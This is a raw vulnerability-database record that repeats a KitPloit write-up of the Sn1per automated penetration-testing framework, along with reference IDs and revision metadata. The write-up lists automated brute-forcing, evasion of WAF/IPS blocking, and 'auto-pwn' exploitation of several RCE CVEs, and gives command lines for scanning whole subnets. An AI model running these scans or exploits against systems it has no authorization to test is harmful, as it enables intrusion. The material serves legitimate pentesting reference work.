<WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** UPDATE: ** Checks for updates and upgrades all components used by sniper. \n * ** REIMPORT: ** Reimport all workspace files into Metasploit and reproduce all reports. \n * ** RELOAD: ** Reload the master workspace report. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc>) \n \n \n\n\n** [ Download Sn1per v5.0 ](<https://github.com/1N3/Sn1per>) **\n", "edition": 4, "enchantments": {"dependencies": {"modified": "2019-06-21T09:57:19", "references": [{"idList": ["VU:999601"], "type": "cert"}, {"idList": ["MSF:AUXILIARY/ADMIN/WEBMIN/FILE_DISCLOSURE", "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP"], "type": "metasploit"}, {"idList": ["ICSA-15-344-01"], "type": "ics"}, {"idList": ["THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "THREATPOST:477B6029652B76463B5C5B7155CDF736"], "type": "threatpost"}, {"idList": ["TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913"], "type": "trendmicroblog"}, {"idList": ["SECURITYVULNS:DOC:30472", "SECURITYVULNS:DOC:22818", "SECURITYVULNS:DOC:31102", "SECURITYVULNS:DOC:22821", "SECURITYVULNS:VULN:10414", "SECURITYVULNS:DOC:31103"], "type": "securityvulns"}, {"idList": ["SMNTC-108273", "SMNTC-70103"], "type": "symantec"}, {"idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350", "CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940", "CFOUNDRY:3B3A927B1B8E5A80A8EA38A6AACF98EE", "CFOUNDRY:13948A26B0F4A736B03310A8560A6F73"], "type": "cloudfoundry"}, {"idList": ["THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6"], "type": "thn"}, {"idList": ["ATLASSIAN:CWD-4879", "ATLASSIAN:BAM-18242"], "type": "atlassian"}, {"idList": ["GLSA-200608-11"], "type": "gentoo"}, {"idList": ["EDB-ID:1997"], "type": "exploitdb"}, {"idList": ["TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"], "type": "talosblog"}, {"idList": ["NMAP:HTTP-VULN-CVE2006-3392.NSE"], "type": "nmap"}, {"idList": ["OPENVAS:57861", "OPENVAS:57067", "OPENVAS:1361412562310811730"], "type": "openvas"}, {"idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"], "type": "rapid7community"}, {"idList": ["IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:38007E943B20A50B729BC17911999C11", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD"], "type": "impervablog"}, {"idList": ["SSV:92804", "SSV:92746", "SSV:97207", "SSV:96420", "SSV:14974"], "type": "seebug"}, {"idList": ["PACKETSTORM:144050", "PACKETSTORM:86448", "PACKETSTORM:144034"], "type": "packetstorm"}, {"idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7"], "type": "pentestit"}, {"idList": ["PAN-SA-2014-0004"], "type": "paloalto"}, {"idList": ["MSRC:6A6ED6A5B652378DCBA3113B064E973B"], "type": "msrc"}, {"idList": ["SAINT:88789BF22A82B3B79355F9F1C375C644", "SAINT:94DD62E7D4C2602EDF0704F85789EDD0", "SAINT:5DF2E8BB0ECF29725510E3173971EDE5", "SAINT:49062325B1FAB54D731E4C8FBF78D940"], "type": "saint"}, {"idList": ["ZDI-09-085"], "type": "zdi"}, {"idList": ["F5:K15159", "F5:K84144321", "F5:K22854260", "SOL15159", "F5:K25238311", "F5:K43451236"], "type": "f5"}, {"idList": ["CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2017-5638", "CVE-2014-0160", "CVE-2017-9805", "CVE-2019-0708", "CVE-2014-6271"], "type": "cve"}, {"idList": ["KITPLOIT:4583746754784092967", "KITPLOIT:8800200070735873517", "KITPLOIT:2304674796555328667", "KITPLOIT:7942195329946074809", "KITPLOIT:998955151150716619", "KITPLOIT:1841841790447853746", "KITPLOIT:9079806502812490909", "KITPLOIT:8661324951126484733", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973"], "type": "kitploit"}, {"idList": ["H1:32570"], "type": "hackerone"}, {"idList": ["MYHACK58:62201994152", "MYHACK58:62201994259", "MYHACK58:62201994154", "MYHACK58:62201784026", "MYHACK58:62201994234", "MYHACK58:62201994153", "MYHACK58:62201994162"], "type": "myhack58"}, {"idList": ["1337DAY-ID-28445"], "type": "zdt"}, {"idList": ["GENTOO_GLSA-200608-11.NASL", "USERMIN_1220_INFO_DISCLOSURE.NASL", "MANDRAKE_MDKSA-2006-125.NASL", "WEBMIN_1290.NASL", "FREEBSD_PKG_227475C209CB11DB9156000E0C2E438A.NASL"], "type": "nessus"}, {"idList": ["OPENSSL:CVE-2014-0160"], "type": "openssl"}, {"idList": ["OSVDB:26772"], "type": "osvdb"}]}, "score": {"modified": "2019-06-21T09:57:19", "value": 7.3, "vector": "NONE"}}, "hash": "6c83012ee3ad36aedf9accb7b85428608f2ecd7f6d91282743edd6aaba15a7fe", "hashmap": [{"hash": "41cf64167afe5858b5f643ae278109ca", "key": "published"}, {"hash": "48ff728472335fc1adde286a415655a6", "key": "references"}, {"hash": "aba454e3574969396c0dddcb45011dcc", "key": "reporter"}, {"hash": "b91d75eb0060970d0a67a3d04b19db68", "key": "cvelist"}, {"hash": "156b5913dcc72ba0ca7e1f3b8aa72160", "key": "title"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "4a931512ce65bdc9ca6808adf92d8783", "key": "bulletinFamily"}, {"hash": "4553be2119d862322dd6fec6bb385401", "key": "type"}, {"hash": "8ffa366cbd9d8b2265aeb64b6500604e", "key": "toolHref"}, {"hash": "0850c3f2e8d5b0e199adc0da59e44c2f", "key": "href"}, {"hash": "77fa4edd351d89b8a22c92e8bc699f5b", "key": "description"}, {"hash": "41cf64167afe5858b5f643ae278109ca", "key": "modified"}], "history": [], "href": "http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "id": "KITPLOIT:8672599587089685905", "lastseen": "2019-06-26T03:27:14", "modified": "2018-11-24T12:43:00", "objectVersion": "1.3", "published": "2018-11-24T12:43:00", "references": ["https://gist.github.com/1N3/8214ec2da2c91691bcbc", "https://github.com/menzow/sn1per-docker", "https://github.com/1N3/Sn1per"], "reporter": "KitPloit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "toolHref": "https://github.com/1N3/Sn1per", "type": "kitploit", "viewCount": 206}, "differentElements": ["cvelist"], "edition": 4, "lastseen": "2019-06-26T03:27:14"}, {"bulletin": {"bulletinFamily": "tools", "cvelist": ["CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2017-5638", "CVE-2014-0160", "CVE-2017-9805", "CVE-2014-6271"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "[  ](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n** Categorized host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Personalized notes field for each host ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n** DEMO VIDEO: ** \n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** AUTO-PWN: ** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600 \n * GPON Router RCE CVE-2018-10561 \n * [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638 \n * Apache Struts 2 RCE CVE-2017-9805 \n * Apache Jakarta RCE CVE-2017-5638 \n * Shellshock GNU Bash RCE CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * Default Apache Tomcat Creds CVE-2009-3843 \n * MS Windows SMB RCE MS08-067 \n * Webmin File Disclosure CVE-2006-3392 \n * [ Anonymous FTP ](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access \n * PHPMyAdmin Backdoor RCE \n * PHPMyAdmin Auth Bypass \n * JBoss Java De-Serialization RCE's \n \n** KALI LINUX INSTALL: ** \n\n \n \n ./install.sh\n\n \n** DOCKER INSTALL: ** \nCredits: @menzow \nDocker Install: [ https://github.com/menzow/sn1per-docker ](<https://github.com/menzow/sn1per-docker>) \nDocker Build: [ https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/ ](<https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/>) \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** UPDATE: ** Checks for updates and upgrades all components used by sniper. \n * ** REIMPORT: ** Reimport all workspace files into Metasploit and reproduce all reports. \n * ** RELOAD: ** Reload the master workspace report. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc>) \n \n \n\n\n** [ Download Sn1per v5.0 ](<https://github.com/1N3/Sn1per>) **\n", "edition": 6, "enchantments": {"dependencies": {"modified": "2019-06-26T07:21:54", "references": [{"idList": ["KITPLOIT:8800200070735873517", "KITPLOIT:2304674796555328667", "KITPLOIT:7942195329946074809", "KITPLOIT:1841841790447853746", "KITPLOIT:9079806502812490909", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973"], "type": "kitploit"}, {"idList": ["1337DAY-ID-30268", "1337DAY-ID-30199", "1337DAY-ID-28454", "1337DAY-ID-28445"], "type": "zdt"}, {"idList": ["ICSA-15-344-01"], "type": "ics"}, {"idList": ["MYHACK58:62201784026", "MYHACK58:62201789104"], "type": "myhack58"}, {"idList": ["TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913"], "type": "trendmicroblog"}, {"idList": ["SECURITYVULNS:DOC:30472", "SECURITYVULNS:DOC:22818", "SECURITYVULNS:DOC:31102", "SECURITYVULNS:DOC:22821", "SECURITYVULNS:VULN:10414", "SECURITYVULNS:DOC:31103"], "type": "securityvulns"}, {"idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350", "CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940", "CFOUNDRY:3B3A927B1B8E5A80A8EA38A6AACF98EE", "CFOUNDRY:13948A26B0F4A736B03310A8560A6F73"], "type": "cloudfoundry"}, {"idList": ["MSF:AUXILIARY/ADMIN/WEBMIN/FILE_DISCLOSURE"], "type": "metasploit"}, {"idList": ["CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2017-5638", "CVE-2014-0160", "CVE-2017-9805", "CVE-2014-6271"], "type": "cve"}, {"idList": ["THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6"], "type": "thn"}, {"idList": ["ATLASSIAN:CWD-4879", "ATLASSIAN:BAM-18242"], "type": "atlassian"}, {"idList": ["GLSA-200608-11"], "type": "gentoo"}, {"idList": ["EDB-ID:1997"], "type": "exploitdb"}, {"idList": ["VU:999601", "VU:112992"], "type": "cert"}, {"idList": ["TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"], "type": "talosblog"}, {"idList": ["NMAP:HTTP-VULN-CVE2006-3392.NSE"], "type": "nmap"}, {"idList": ["SAINT:88789BF22A82B3B79355F9F1C375C644", "SAINT:E218D6FA073276BB012BADF2CCE50F0E", "SAINT:94DD62E7D4C2602EDF0704F85789EDD0", "SAINT:5DF2E8BB0ECF29725510E3173971EDE5", "SAINT:49062325B1FAB54D731E4C8FBF78D940"], "type": "saint"}, {"idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"], "type": "rapid7community"}, {"idList": ["SSV:92804", "SSV:92746", "SSV:97207", "SSV:96420", "SSV:14974"], "type": "seebug"}, {"idList": ["IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:81785CACF2722C5387530DCFDE54E6E4", "IMPERVABLOG:38007E943B20A50B729BC17911999C11", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD"], "type": "impervablog"}, {"idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7"], "type": "pentestit"}, {"idList": ["THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:3D545239C6AE58821904FBF3069CB365", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "THREATPOST:477B6029652B76463B5C5B7155CDF736"], "type": "threatpost"}, {"idList": ["PACKETSTORM:147247", "PACKETSTORM:144050", "PACKETSTORM:147392", "PACKETSTORM:86448", "PACKETSTORM:144034"], "type": "packetstorm"}, {"idList": ["PAN-SA-2014-0004"], "type": "paloalto"}, {"idList": ["SMNTC-70103"], "type": "symantec"}, {"idList": ["A9E466E8-4144-11E8-A292-00E04C1EA73D"], "type": "freebsd"}, {"idList": ["GENTOO_GLSA-200608-11.NASL", "USERMIN_1220_INFO_DISCLOSURE.NASL", "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "DEBIAN_DSA-4156.NASL", "MANDRAKE_MDKSA-2006-125.NASL", "WEBMIN_1290.NASL", "FREEBSD_PKG_227475C209CB11DB9156000E0C2E438A.NASL"], "type": "nessus"}, {"idList": ["ZDI-09-085"], "type": "zdi"}, {"idList": ["OPENVAS:1361412562310704156", "OPENVAS:57861", "OPENVAS:57067", "OPENVAS:1361412562310811730"], "type": "openvas"}, {"idList": ["F5:K15159", "F5:K84144321", "F5:K22854260", "SOL15159", "F5:K43451236"], "type": "f5"}, {"idList": ["E-643"], "type": "dsquare"}, {"idList": ["H1:32570"], "type": "hackerone"}, {"idList": ["DEBIAN:DLA-1325-1:E895C"], "type": "debian"}, {"idList": ["OPENSSL:CVE-2014-0160"], "type": "openssl"}, {"idList": ["OSVDB:26772"], "type": "osvdb"}]}, "score": {"modified": "2019-06-26T07:21:54", "value": 7.1, "vector": "NONE"}}, "hash": "6c83012ee3ad36aedf9accb7b85428608f2ecd7f6d91282743edd6aaba15a7fe", "hashmap": [{"hash": "41cf64167afe5858b5f643ae278109ca", "key": "published"}, {"hash": "48ff728472335fc1adde286a415655a6", "key": "references"}, {"hash": "aba454e3574969396c0dddcb45011dcc", "key": "reporter"}, {"hash": "b91d75eb0060970d0a67a3d04b19db68", "key": "cvelist"}, {"hash": "156b5913dcc72ba0ca7e1f3b8aa72160", "key": "title"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "4a931512ce65bdc9ca6808adf92d8783", "key": "bulletinFamily"}, {"hash": "4553be2119d862322dd6fec6bb385401", "key": "type"}, {"hash": "8ffa366cbd9d8b2265aeb64b6500604e", "key": "toolHref"}, {"hash": "0850c3f2e8d5b0e199adc0da59e44c2f", "key": "href"}, {"hash": "77fa4edd351d89b8a22c92e8bc699f5b", "key": "description"}, {"hash": "41cf64167afe5858b5f643ae278109ca", "key": "modified"}], "history": [], "href": "http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "id": "KITPLOIT:8672599587089685905", "lastseen": "2019-06-26T07:21:54", "modified": "2018-11-24T12:43:00", "objectVersion": "1.3", "published": "2018-11-24T12:43:00", "references": ["https://gist.github.com/1N3/8214ec2da2c91691bcbc", "https://github.com/menzow/sn1per-docker", "https://github.com/1N3/Sn1per"], "reporter": "KitPloit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "toolHref": "https://github.com/1N3/Sn1per", "type": "kitploit", "viewCount": 318}, "differentElements": ["cvelist"], "edition": 6, "lastseen": "2019-06-26T07:21:54"}, {"bulletin": {"bulletinFamily": "tools", "cvelist": ["CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2017-5638", "CVE-2014-0160", "CVE-2017-9805", "CVE-2014-6271"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "[  ](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n** Categorized host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Personalized notes field for each host ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n** DEMO VIDEO: ** \n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** AUTO-PWN: ** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600 \n * GPON Router RCE CVE-2018-10561 \n * [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638 \n * Apache Struts 2 RCE CVE-2017-9805 \n * Apache Jakarta RCE CVE-2017-5638 \n * Shellshock GNU Bash RCE CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * Default Apache Tomcat Creds CVE-2009-3843 \n * MS Windows SMB RCE MS08-067 \n * Webmin File Disclosure CVE-2006-3392 \n * [ Anonymous FTP ](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access \n * PHPMyAdmin Backdoor RCE \n * PHPMyAdmin Auth Bypass \n * JBoss Java De-Serialization RCE's \n \n** KALI LINUX INSTALL: ** \n\n \n \n ./install.sh\n\n \n** DOCKER INSTALL: ** \nCredits: @menzow \nDocker Install: [ https://github.com/menzow/sn1per-docker ](<https://github.com/menzow/sn1per-docker>) \nDocker Build: [ https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/ ](<https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/>) \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target 